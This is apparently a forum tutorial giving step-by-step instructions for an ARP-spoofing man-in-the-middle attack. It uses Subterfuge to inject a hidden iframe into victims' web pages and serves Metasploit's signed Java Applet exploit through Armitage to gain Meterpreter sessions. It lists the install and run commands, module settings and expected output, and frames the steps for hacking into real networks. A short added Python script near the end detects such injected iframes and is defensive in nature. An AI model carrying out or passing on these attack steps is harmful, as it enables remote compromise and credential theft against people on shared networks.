Hello, I wanna share an interesting technique by which we can get a Meterpreter session over a MITM in a very easy way.
Tools:
1. Ubuntu [Recommended Kali]
2. Subterfuge [Download Here]
3. Armitage/Metasploit
We are already familiar with Armitage and Ubuntu.
What is Subterfuge?
Subterfuge is an automated man-in-the-middle attack framework. It is a web-based tool that runs smoothly on your local system without a separately installed web server (one is included in the installation). It is a simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol.
Host Machine = Windows 7
Victim Machine = Windows XP
Exploit Machine = Kali
Procedure
1. Start your VM and load Kali.
2. Installation of Subterfuge:
The installer is graphical and you won't have any problem.
root@digit-laptop:~# tar -zxvf SubterfugePublicBeta5.0.tar.gz
root@digit-laptop:~# cd subterfuge
root@digit-laptop:~# python install.py -i
Running Subterfuge:
root@digit-laptop:~# subterfuge
If we get such output after running subterfuge, then it is successfully installed.
Setting The Environment
a) In a real scenario, when you are hacking into a network through a VM, don't forget to replicate the network to your VM machine.
b) In the VM, do it this way
3. Now start Subterfuge on the external IP address and on any port you desire. This will allow us to control Subterfuge from anywhere around the network:
subterfuge -s IP:port
In this case:
root@kali:~# subterfuge -s 192.168.72.131:9000
Subterfuge courtesy of r00t0v3rr1d3 & 0sm0s1z
Validating models...
0 errors found
Django version 1.3.1, using settings 'subterfuge.settings'
Development server is running at http://192.168.72.131:9000/
Quit the server with CONTROL-C.
Now minimize it. You can now configure it from anywhere around your network.
Open up a browser and enter the address of Subterfuge.
In this case we can configure it from the exploit machine itself or from our host machine, i.e. Win 7.
Exploit Machine:
Host Machine:
Configuring Subterfuge:
a) Click on Settings
b) Select the network interface and gateway
Note: Don't auto-configure, as in some cases it results in problems.
For a VM, go to the Virtual Network Editor to find and configure your gateway.
c) In the configuration section, you can configure the injection rate and the page reload rate.
The injection rate is the timer after which the payload is sent to the victim.
Click Apply to save the settings.
4. Go to Modules and select HTTP Code Injection
5. Then set Exploit to inject-ext-server and Payload to Iframe Injection
6. Fill in the IP of the exploit machine, i.e. Kali, and the port [through which the payload is going to travel]. Always 80 or 8080 for HTTP injection
7. Click Apply, go to the homepage and click Start
Subterfuge is now started
8. This is the output you should get on the exploit machine where you started Subterfuge
Let's configure the payload
9. Start up Armitage and search for signed Java Applet. Click on it; the options are already configured and correct. Just set the URI path to "/".
Note: The port should be the same as the one you put in Subterfuge for sending the exploit
10. Start the exploit server
11. Open up Subterfuge again and refresh it until you see a green loading bar
Everything is done. Now, as soon as your victims in the network browse anything, there will be a hidden iframe on every page with the Java applet.
You will start getting Meterpreter sessions in Armitage.
Victim:
Meterpreter Session:
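Seen from the defender's side, the hidden iframe described above is visible in the HTTP response body. The following is an added example, not part of the original post: it audits a captured page for cross-host iframes that are invisible or point at a private address. The sample HTML and the attributes of the injected frame are constructed assumptions; only the address 192.168.72.131 and port 8080 come from the post.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class IframeAudit(HTMLParser):
    """Collect cross-host iframes that are invisible or point at a private IP."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = urlsplit(src).hostname
        if not host or host == self.page_host:
            return  # relative or same-host frame: not what injection produces
        hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                  or "hidden" in a or bool(HIDDEN_STYLE.search(a.get("style", ""))))
        try:
            private_ip = ipaddress.ip_address(host).is_private
        except ValueError:
            private_ip = False  # a DNS name, not a literal address
        if hidden or private_ip:
            self.findings.append({"src": src, "hidden": hidden, "private_ip": private_ip})

def audit(html, page_host):
    """Return the suspicious iframes found in one response body."""
    parser = IframeAudit(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample body for a page served from www.example.com.
CLEAN = ('<html><body><h1>News</h1><iframe src="https://video.example.net/embed/1" '
         'width="560" height="315"></iframe></body></html>')
# Same page with a constructed injected frame pointing at the post's exploit machine.
TAMPERED = CLEAN.replace(
    "</body>",
    '<iframe src="http://192.168.72.131:8080/" width="0" height="0" '
    'style="display:none"></iframe></body>')

if __name__ == "__main__":
    print(audit(TAMPERED, "www.example.com"))
```

Run it on bodies captured at the client or at a proxy. A frame that shows up only for clients on one network segment points to in-path modification rather than a change on the web server.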
It took me 3 hrs to write this; it takes 3 sec to say thanks.